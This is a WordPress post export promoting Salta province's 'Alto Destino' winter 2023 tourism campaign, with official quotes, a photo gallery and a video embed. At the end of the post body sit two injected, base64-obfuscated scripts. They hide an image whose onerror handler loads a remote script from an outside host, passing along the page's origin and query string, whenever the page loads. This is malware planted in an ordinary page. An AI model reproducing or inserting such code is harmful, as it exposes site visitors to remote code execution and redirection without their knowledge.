{"id":2710,"date":"2023-06-09T09:56:46","date_gmt":"2023-06-09T12:56:46","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2710"},"modified":"2025-08-14T00:15:26","modified_gmt":"2025-08-14T03:15:26","slug":"salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2710","title":{"rendered":"Salta, un Alto Destino que invita a vivir un invierno \u00fanico"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>La campa\u00f1a de promoci\u00f3n tur\u00edstica para el invierno 2023, invita a nuevas experiencias donde el concepto de altura excede los paisajes impactantes y refiere tambi\u00e9n a la hospitalidad del salte\u00f1o, a la riqueza gastron\u00f3mica y cultural.<\/em><\/h4>\n\n\n\n<p>Alto Destino es el nombre de la nueva campa\u00f1a de promoci\u00f3n tur\u00edstica de Salta presentada con acciones al consumidor final en los principales mercados prioritarios y en las principales redes sociales con el objetivo de invitar a m\u00e1s turistas a disfrutar de la experiencia Salta durante la temporada de invierno.<\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes viene &nbsp;realizando acciones promocionales presenciales durante todo el a\u00f1o y de manera oficial presenta para el invierno 2023 la campa\u00f1a Alto Destino. Salta destaca por su belleza natural, su patrimonio cultural e hist\u00f3rico, su riqueza gastron\u00f3mica y compromiso por ser un destino sostenible, con experiencias consolidadas e innovadoras.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7437-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7437-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpg\" alt=\"Salta, un Alto Destino que invita a vivir un invierno \u00fanico\"\/><\/a><\/figure>\n\n\n\n<p>El concepto comunicacional general de la campa\u00f1a, est\u00e1 anclado no solo en la altura propiamente dicha que tiene Salta sino tambi\u00e9n en el lunfardo, donde se utiliza la palabra ALTO como referencia a algo que tiene un atractivo especial y fuera de serie.<\/p>\n\n\n\n<p>Con estas acciones promocionales, Salta busca aumentar la visibilidad de sus atractivos con acciones directas con potenciales turistas y reforzando el posicionamiento de liderazgo como se vio reflejado en las ventas del programa nacional PreViaje IV donde la provincia qued\u00f3 primera entre la elecci\u00f3n de los viajeros.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7438-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7438-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpg\" alt=\"Salta, un Alto Destino que invita a vivir un invierno \u00fanico\" width=\"340\" height=\"237\"\/><\/a><\/figure><\/div>\n\n\n<p>La promoci\u00f3n es uno de los puntales del plan estrat\u00e9gico Liderar para lo que se tienen en cuenta la oferta disponible en las siete regiones tur\u00edsticas de la provincia: Selva de Monta\u00f1a, Valles Calchaqu\u00edes, Valle de Lerma, Ciudad de Salta y Destinos Cercanos, Quebradas Andinas, Puna de los Andes y Valle Hist\u00f3rico y Gaucho.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a&nbsp;<\/strong>afirm\u00f3 que \u00abestamos presentes con promoci\u00f3n en cada momento del a\u00f1o, junto al sector privado, para tener en este caso un invierno con alto nivel de actividad que nos permita seguir creciendo en el mercado nacional y en los arribos internacionales\u00bb, indic\u00f3 el funcionario, quien destac\u00f3 la decisi\u00f3n pol\u00edtica del gobernador Gustavo S\u00e1enz de fortalecer esta industria que \u00abes una gran generadora de empleo y desarrollo integral\u00bb.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7439-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7439-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpg\" alt=\"Salta, un Alto Destino que invita a vivir un invierno \u00fanico\" width=\"429\" height=\"286\"\/><\/a><\/figure><\/div>\n\n\n<p>En este paralelismo entre la altura topogr\u00e1fica y la espectacularidad de los paisajes, se priorizaron tomas donde la altura est\u00e1 presente. Lugares de monta\u00f1a, el Tren a las Nubes, planos a\u00e9reos que muestran esa inmensidad e invitan al espectador a contemplarlo. &nbsp;En este sentido el objetivo fue plasmar en un spot fresco y din\u00e1mico, esas maravillas naturales conjugadas con el disfrute de los personajes que forman parte del guion.&nbsp;<\/p>\n\n\n\n<p><strong>Conceptos y producci\u00f3n del spot<\/strong><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7440-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7440-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpg\" alt=\"Salta, un Alto Destino que invita a vivir un invierno \u00fanico\" width=\"266\" height=\"177\"\/><\/a><\/figure><\/div>\n\n\n<p>Asimismo, &nbsp;la producci\u00f3n refleja la calidez de la gente y la riqueza cultural en cada personaje que aparece a lo largo del spot y la integraci\u00f3n con el turista que nos elige a\u00f1o tras a\u00f1o. Por otra parte, la pieza musical seleccionada es obra de artistas salte\u00f1os, un recurso valioso que transmite emoci\u00f3n.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Galer\u00eda de Fotos<\/h2>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2711\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3631-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpg\" alt=\"\" class=\"wp-image-2711\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3631-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3631-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3631-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3631-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3631-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"899\" height=\"600\" data-id=\"2712\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3632-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpg\" alt=\"\" class=\"wp-image-2712\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3632-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3632-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3632-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3632-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3632-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"2713\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3633-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpeg\" alt=\"\" class=\"wp-image-2713\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3633-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico.jpeg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3633-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3633-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3633-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/3633-salta-un-alto-destino-que-invita-a-vivir-un-invierno-unico-630x420.jpeg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n<\/figure>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Salta, un Alto Destino que invita a vivir un invierno \u00fanico\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/9VNjk-skE3M?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La campa\u00f1a de promoci\u00f3n tur\u00edstica para el invierno 2023, invita a nuevas experiencias donde el concepto de altura excede los paisajes impactantes y refiere tambi\u00e9n a la hospitalidad del salte\u00f1o, a la riqueza gastron\u00f3mica y cultural. Alto Destino es el nombre de la nueva campa\u00f1a de promoci\u00f3n tur\u00edstica de Salta presentada con acciones al consumidor [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2712,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15,18],"tags":[],"class_list":{"0":"post-2710","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2710"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2710"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2710\/revisions"}],"predecessor-version":[{"id":7063,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2710\/revisions\/7063"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2712"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2710"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2710"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2710"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}